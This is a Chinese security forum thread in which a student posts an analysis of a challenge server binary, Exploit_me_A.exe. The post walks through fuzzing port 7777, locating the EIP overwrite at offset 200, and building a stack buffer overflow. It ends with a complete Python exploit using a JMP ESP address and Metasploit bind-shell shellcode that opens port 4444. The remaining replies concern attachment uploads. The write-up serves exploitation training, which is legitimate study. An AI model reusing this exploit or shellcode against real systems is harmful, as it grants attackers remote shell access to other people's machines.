能力值:
( LV2,RANK:10 )
|
-
-
2 楼
Exploit_me_A.exe 分析报告
提交者看雪ID:hahar
职业:(学生、程序员、安全专家、黑客技术爱好者、其他?)
学生
1. PE分析
拿到程序,从介绍中知道是个服务器程序,直接运行,然后使用Process Explorer查看Exploit_me_A.exe监听的端口,如图1所示:
知道程序监听7777端口,接着使用python脚本发送一串A过去,看看服务器反应:
#!/usr/bin/env python
import socket
host = "127.0.0.1"
port = 7777
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print " Connecting to [%s:%d]" % (host, port)
s.connect((host, port))
buffer = "A" * 10
print " Sending [%s]" % buffer
s.send(buffer)
print " Closing socket"
s.close()
服务器返回了输入的数据,初步断定是个echo的程序,输入什么就返回什么。
2. 漏洞描述
输入10个A的时候程序没有溢出,逐步加大A的数量,当A到1000时,
cdb调试器报告异常(ps:使用cdb包含在windwos debug tools 工具包中,使用cdb –iae可以设置cdb为异常处理的调试器)
由此可以看到服务器程序在处理用户输入的数据时存在异常,导致溢出,从调试器上看正在执行41414141,显然是我们输入的A,下一步要精确定为溢出点,这里可以采用二分法(逐步用500,250,125长度去测试)或者百、十、个位定位法定位。这里采用第二种方法。
修改python程序
buffer = "”
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
buffer += ch *100
从结果看到是字符”C”覆盖了EIP,由此确定溢出长度在200~300之间,继续定位十位
buffer = "a"*200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
buffer += ch *10
从调试器看到字符A覆盖了EIP,于是确定覆盖长度在200~210,同理定位个位
buffer = "a"*200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
buffer += ch *1
从结果看,从201~204覆盖了EIP。下面就可以构造exploit了。
Buffer = A*200+JMPESP+NOP*20+Shellcode
这里可以看到NOP我用了20,其实只要大于函数返回是减去的个数就可以了,NOP指令不影响shellocde执行。JMPESP采用中文平台下通用的JMPESP = "\x12\x45\xFA\x7F"
3.shellcode功能
我是个懒人,直接从http://metasploit.com:55555/PAYLOADS?FILTER=win32站点上进行定制
选择windows bind shell,产生一个监听4444端口的shellcode
4.稳定性与通用性
由于程序中的JMPESP地址适用所有的中文操作系统,shellcode也是动态定位API地址,具有很好的稳定性与通用性。
4.exploit运行成功截图
可以看到4444端口正在监听。
5.exploit
#!/usr/bin/env python
import socket
host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
#监听4444端口
shellcode="\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
shellcode+="\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e"
shellcode+="\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a"
shellcode+="\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08"
shellcode+="\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9"
shellcode+="\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a"
shellcode+="\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a"
shellcode+="\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1"
shellcode+="\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41"
shellcode+="\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93"
shellcode+="\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2"
shellcode+="\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70"
shellcode+="\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9"
shellcode+="\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8"
shellcode+="\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6"
shellcode+="\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1"
shellcode+="\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc"
shellcode+="\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e"
shellcode+="\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0"
shellcode+="\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41"
shellcode+="\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce"
shellcode+="\xed\x94\x64\x6e\x6e\x6b\xb2\x91"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print " Connecting to [%s:%d]" % (host, port)
s.connect((host, port))
#buffer = "a"*200
#li = ["A","B","C","D","E","F","G","H","I","J"]
#for ch in li:
# buffer += ch *1
#print buffer
buffer = "A" * 200 +JMPESP+"\x90"*20+shellcode
#buffer = "A" * 1000
print " Sending [%s]" % buffer
s.send(buffer)
print " Closing socket"
s.close()
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
无上传附件功能,图片和word文档无法提交
|
能力值:
(RANK:350 )
|
-
-
4 楼
点击回复主题,再单击管理附件,就可上传附件了。
如果插图,参考这帖:
http://bbs.pediy.com/showpost.php?postid=292659
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
support it.
|
